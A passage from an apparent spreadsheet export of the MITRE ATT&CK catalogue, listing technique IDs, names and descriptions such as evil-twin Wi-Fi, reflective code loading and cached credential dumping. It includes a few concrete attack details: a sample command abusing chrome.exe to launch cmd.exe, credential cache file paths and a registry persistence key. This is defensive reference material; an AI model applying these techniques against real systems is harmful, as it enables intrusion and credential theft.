By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin)  Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. 
Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.
Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points.
https://attack.mitre.org/techniques/T1557/004</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>Reflective Code Loading</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</si>
  <si>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(e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).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For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)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
https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>T1016.002</t>
  </si>
  <si>
    <t>Wi-Fi Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1016/002</t>
  </si>
  <si>
    <t>T1480.002</t>
  </si>
  <si>
    <t>Mutual Exclusion</t>
  </si>
  <si>
    <t>Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
https://attack.mitre.org/techniques/T1480/002</t>
  </si>
  <si>
    <t>T1564.011</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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accessing other containers running on the host, or setting up a command and control channel on the host.
https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Shortcut Modification</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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1010</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt;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
https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1021/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>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or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.
https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1597/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1602/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.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 or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023)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t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</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</si>
  <si>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
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018)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
https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/003</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Browser Session Hijacking</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</si>
  <si>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
https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services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</si>
  <si>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
https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>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traffic.(Citation: FireEye APT28)
https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>T1556.007</t>
  </si>
  <si>
    <t>Hybrid Identity</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</si>
  <si>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Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud 
* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory 
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID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Entra ID,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Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)
https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>T1059.009</t>
  </si>
  <si>
    <t>Cloud API</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1059/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1218.015</t>
  </si>
  <si>
    <t>Electron Applications</t>
  </si>
  <si>
    <t>Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)
Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8)
Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)
https://attack.mitre.org/techniques/T1218/015</t>
  </si>
  <si>
    <t>T1562.012</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
https://attack.mitre.org/techniques/T1610</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Launch Daemon</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</si>
  <si>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
https://attack.mitre.org/techniques/T1543/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1491</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1557/003</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</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</si>
  <si>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
https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access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
https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Information Discovery</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</si>
  <si>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
https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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Entra ID,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
https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked)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
https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Time Providers</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</si>
  <si>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`HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: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creating a new arbitrarily named subkey  pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>T1136.001</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</si>
  <si>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
https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014)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
https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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With administrator privileges,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
Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>T1585.002</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</si>
  <si>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Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)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
https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1557/001</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</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</si>
  <si>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https://attack.mitre.org/techniques/T1595</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</si>
  <si>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</si>
  <si>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</si>
  <si>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risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)
https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Create Process with Token</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</si>
  <si>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
https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Setuid and Setgid</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</si>
  <si>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
https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>T1598.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1598/004</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) 
With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>T1548.005</t>
  </si>
  <si>
    <t>Temporary Elevated Cloud Access</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</si>
  <si>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 while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023)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
https://attack.mitre.org/techniques/T1548/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>T1593.003</t>
  </si>
  <si>
    <t>Code Repositories</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1593/003</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>T1496.002</t>
  </si>
  <si>
    <t>Bandwidth Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.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 Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)
In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)
https://attack.mitre.org/techniques/T1496/002</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</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</si>
  <si>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lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.
https://attack.mitre.org/techniques/T1087</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1090</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>T1136.002</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</si>
  <si>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account.(Citation: Savill 1999)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)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
https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also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 It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).
https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>T1588.001</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</si>
  <si>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
https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal</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</si>
  <si>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
https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>T1583.003</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</si>
  <si>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
https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1550/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1609</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Some files and directories may require elevated or specific user permissions to access.
https://attack.mitre.org/techniques/T1083</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1020/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1114/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1074</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Entra ID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
https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>T1098.005</t>
  </si>
  <si>
    <t>Device Registration</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</si>
  <si>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Entra ID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Entra ID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Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT)
https://attack.mitre.org/techniques/T1098/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices,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
https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1600/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/002</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1218/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>T1584.005</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</si>
  <si>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
https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
    <t>T1559.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1559/003</t>
  </si>
  <si>
